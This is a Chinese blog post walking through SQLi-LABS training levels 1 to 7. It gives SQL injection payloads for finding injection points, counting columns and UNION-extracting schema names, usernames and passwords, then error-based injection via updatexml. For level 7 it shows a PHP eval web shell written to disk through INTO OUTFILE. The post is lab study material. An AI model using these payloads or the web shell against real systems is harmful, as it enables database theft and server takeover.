sqllabs1-7sql注入

最新推荐文章于 2024-09-14 19:55:29 发布
最新推荐文章于 2024-09-14 19:55:29 发布
阅读量484 收藏 10
点赞数 5
文章标签: 数据库 sql oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sjt2323302003/article/details/136988862
版权
本文详细介绍了在Web应用中针对不同情况下的SQL注入攻击,包括?id参数的判断、ORDERBY滥用、联合查询等手段,以及如何利用这些漏洞获取数据库信息、字段名甚至执行代码。从源码分析中展示了字符型和数字型注入,以及盲注攻击的逐步升级过程。
摘要由CSDN通过智能技术生成

先在?id参数后面判断是否存在sql注入
id=1     返回正常
id=1'    返回报错(说明可能存在sql注入)
id=1 and 1=1    返回正常
id=1 and 1=2    返回正常
id=1'  and 1=1   报错
id=1'  and 1=2   报错
说明$id后面可能还存在sql语句(源码源码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";)(--+是为了注释后面的limit 0,1";)
id=1'   and 1=1  --+  返回正常
id=1'   and 1=2  --+   报错

接下来拿开源靶场测试sqllibs
接上面可以用order by 来字段测试有多少列
?id=1'  order by 1 --+正常
?id=1' order by 3  --+正常
?id=1' order by 4  --+报错
说明这里字段数为3,之后用联合查询union select 拼接
?id=1' and 1=2 union select 1,2,3 --+或者#这里哪个都可以,这里的and 1=2是为了就将正确的id=1'不显示,返回错误,显示后面union select语句的值
结果:这里SQL查询语句中select后面的字段数量是3个,2,3 字段.
可以利用来判断注入点语句如下:?id=1' and 1=2 union select 1,database(),version() --+     得到数据库名以及版本号。
可以查看数据库名:?id=1' and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+当然这个语句支持的是mysql5.0以上的。当然这里不拘泥于查询information_schema这个数据库名
查看数据库中的表:?id=1' and 1=2 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=database()),3 --+
或者查询数据库中其他的表:?id=1' and 1=2 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security'),3 --+
查看表中的字段:?id=1' and 1=2 union select 1,(select group_concat(column_name)from information_schema.columns where table_name='users'),3 --+
爆出指定字段:?id=1' and 1=2 union select 1,(select group_concat(username,char(32),password)from security.users),3 --+

第二关与第一关基本一样就是在?id=1' and 1=1 --+(把' 去掉就行其他查询方式以及原理一样),源码:源码:$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";(这里是数字型注入)    其他流程都和第一关一样

第三关(这里是字符型注入)源码:$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";因为源码中多了(),所以注入时,使用id=1’)闭合源码中前面的括号:          ?id=1') and 1=1 --+   其他流程都和第一关一样


第四关(这里是字符型注入)源码源码:
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
因为在传入$id前,对$id进行了双引号包裹,然后sql语句中的$id又有括号包围,所以注入时使用id=1")进行闭合构造,其他流程都和第一关一样

第五关:(采取sql盲注)
源码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
这里盲注报错有三种,floor updataxml extractvalue,这里我们用updataxml:自定义一个payload:
union select updatexml(1,concat('~',(payload),'~'),3)
判断数据库:union select updatexml(1,concat('~',(database()),'~'),3) --+
判断表名:?id=1' union select updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'~'),3) --+

判断字段名:?id=1' union select updatexml(1,concat('~',(select column_name from information_schema.columns where table_name='users' limit 0,1),'~'),3) --+

爆出他的字段:?id=1' union select updatexml(1,concat('~',(select username from users limit 0,1),'~'),3) --+

第六关字符型注入+盲注    
源码:$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
过程:id闭合需要修改为id=1",其它和Pass-5一样


第七关:字符型注入+盲注
源码:源码:
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
id闭合需要修改为id=1’)),使用into outfile写入一句话
因为作者注释了数据库错误显示,我们打开它,先使用报错注入获取当前网站根目录,在进行写入一句话
?id=1'))  and 1=2 union select null,'<?php @eval($_REQUEST['111']);?>',null into outfile '一句话路径名' --+


 

demonlover
关注
SQL注入天书SQLi-LABS(Less1-7)
网络猿的博客
01-15 1300
SQL注入天书SQLi-LABS(Less1-7) 往期回顾: SQLi-LABS搭建教程:SQL注入天书(SQLi-LABS)搭建 文章目录SQL注入天书SQLi-LABS(Less1-7)一、SQL注入天书SQLi-LABS(一)Less-1(二)Less-2(三)Less-3(三)Less-4(三)Less-5(三)Less-6(三)Less-7 一、SQL注入天书SQLi-LABS (一)Less-1 1、http://127.0.0.1/sqli-labs/Less-1/?id=1’ o
sql-labs 1-10关 含多种解法 包括sqlmap py脚本
07-23
#### Less-1:基本SQL注入 在这一关中,玩家将面对一个常见的SQL注入点。注入点出现在URL参数中,例如`?id=1'`。此关卡旨在考察用户是否了解SQL注入的基本原理及其应用。 **知识点解析**: - **SQL注入基础**:...
sqli-labs(7)
qq_61988806的博客
11-29 65
看到“前面有了\这里使用宽字节注入这里security换成databse()不然这里也会被转义。
sqli-labs关卡7(结合文件上传漏洞+一句马+菜刀)通关思路
zyh1588的博客
10-28 1329
小白对sqli-labs第七关的理解
sqli-labs 第七关 多命通关攻略
两个月亮
01-05 1729
错误输入与不正常输入的返回结果是相同的。该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。怎么会这样?等等,我们刚刚得出的结论好像被忽略了:该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。既然返回结果为空都将返回,那我们刚刚构造的判断语句又怎么能够判断出注入类型呢?在遇到读写权限问题后,尝试向搜索引擎寻求帮助,但解决方案大多针对 Linux 操作系统且并不详细,只好自己摸索了。
探索SQL注入的艺术:SQLI-LABS-PHP7深度解析与应用推荐
gitblog_00056的博客
06-01 825
探索SQL注入的艺术:SQLI-LABS-PHP7深度解析与应用推荐 项目地址:https://gitcode.com/skyblueee/sqli-labs-php7 项目介绍 在网络安全的浩瀚宇宙中,SQL注入是一种常见的攻击手段,对于开发者和安全研究人员而言,了解并掌握其原理至关重要。SQLI-LABS-PHP7 正是为此而生,它是一个专为学习SQL注入技巧构建的实战平台。基于广受好评的SQ...
sqllab第七关通关笔记
I_WORM的博客
03-13 705
如果是简单的单引号绕过的话,注释符应该把后面的那个引号进行注释了,那么and后面的引号应该会因为引号不闭合进行报错,但是这里正常显示了,这里就搞不懂了;设置payload2为字符组合类型(brute forcer),设置最小长度和最大长度都为1,因为他会把指定区间的长度都进行枚举,这里只需要进行字符爆破,所以设定长度为1,这样就是枚举每个字符和数字了。开始爆破,得出结果后进行过滤;因为错误和正确的输出长度是一样的,所以没办法利用长度进行辨别,点击上面的过滤条件,将正确的输出内容复制到过滤条件中,点击应用。
网络安全-sql注入实战-sql-labs(1~10)
09-02
网络安全-sql注入实战-sql-labs(1~10)
sqli-labs-master.zip sql注入的学习靶机
01-18
sql注入的学习靶机,由于github经常挂,这里特提供大家下载。
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
(slmap)【sqli-labs7】GET请求、文件读写注入:使用方法
05-31 846
sqlmap注入】sqli-labs7
sqli-labs-----第7关
wyzhxhn的博客
11-09 2201
布尔盲注、一句话木马、利用文件写入爆出信息
sqli-labs7
qq_38989921的博客
11-27 457
sqli-labs7 7: 带双括号的单引号注入: 1-6关是返回报错信息的,我们首先挑选一关进行报错注入,获取网站的绝对路径,@@datadir获取数据库存储数据路径,@@basedir是MYSQL获取安装路径: 在实际中获取网站的绝对路径是很困难的。 读写权限测试: MySQL是通过权限表来控制用户对数据库访问的,权限表存放在mysql数据库中,主要的权限表有以下几个:user,db,host,table_priv,columns_priv和procs_priv。 返回正常,有读取权限。 localho
sql-lab 通关Less1 -65(深入学习)
热门推荐
ST0new的博客
10-02 2万+
文章目录sql-lab 复现通关(深入学习)前言目的less-1 基于错误的单引号字符串Less-2 基于错误的get整型注入Less-3 基于错误的get单引号变形字符型注入Less-4 基于错误的GET双引号字符型注入Less-5 双注入GET单引号字符型注入Less-6 双注入GET双引号字符型注入Less-7 导出文件GET字符型注入Less-8 布尔型单引号GET盲注Less-9 ...
sql-labs详细全解
qq_38415434的博客
10-23 4273
** sql-labs详细全解 ** 第一关: 常见的string注入: http://192.168.80.139/sqli-labs-master/Less-1/?id=1 构造url: 1.http://192.168.80.139/sqli-labs-master/Less-1/?id=1’ 报错 2.http://192.168.80.139/sqli-labs-master/Les...
Sqlilabs-7
KAKA的博客
07-06 678
题目说是上传文件,可以上传一个 php 反弹 shell,kali 开启 nc 连上就 OK http://sqlilabs/Less-7/?id=1' 回显报错 http://sqlilabs/Less-7/?id=1'--+ 回显报错 http://sqlilabs/Less-7/?id=1')--+ 回显报错 http://sqlilabs/Less-7/?id=1'))--+ 回显正常 http.
sqli-labs第七关(详讲)
TA不懒,但还没有添加简介
09-11 4420
sqli-labs第七关 第七关根据提示知道要用outfile,于是通过注入判断发现是字符型 开始构造语句 结合前六关的经验首先想到括号) 不对 再加一个括号试试? 对了 那么语句部分可能是 where id=(('$id')) 然后通过order by判断字段个数 先简单的提一下outfile 在MySQL里面使用select … into outfile可以把数据导出到文本文件上 里面有几个参数 secure_file_priv 用来限制导出效果。他有三个属性: null限制不能导出 为空可
sqli-labs第七关
YQavenger的博客
10-08 3223
1、首先判断注入点 正常显示是这样的 不正常显示是这样的 猜到最后,注入点是字符型,单引号加两个小括号,?id=1’)) – - 因为它只有正常显示和不正常显示两种状态,并且也没有MySQL的报错信息。正常来说,这里可以使用盲注,但是它页面上提示的有“Use outfile…”,既然它提示了,那么就说明它开了读写权限。所以这一关就用SQL注入读写文件来试一下 2、判断文件路径 可以利用读文件函数load_file(),结合dnslog.cn网站,实现带外攻击,看到MySQL的安装目录在哪。 先说一下M
4.网络编程
最新发布
weixin_45476535的博客
09-14 583
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
sqllabs1-75
09-03
关于sqllabs1-75,根据提供的引用内容,无法直接得出与其相关的信息。可能需要更多的上下文或具体的问题来进一步讨论。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值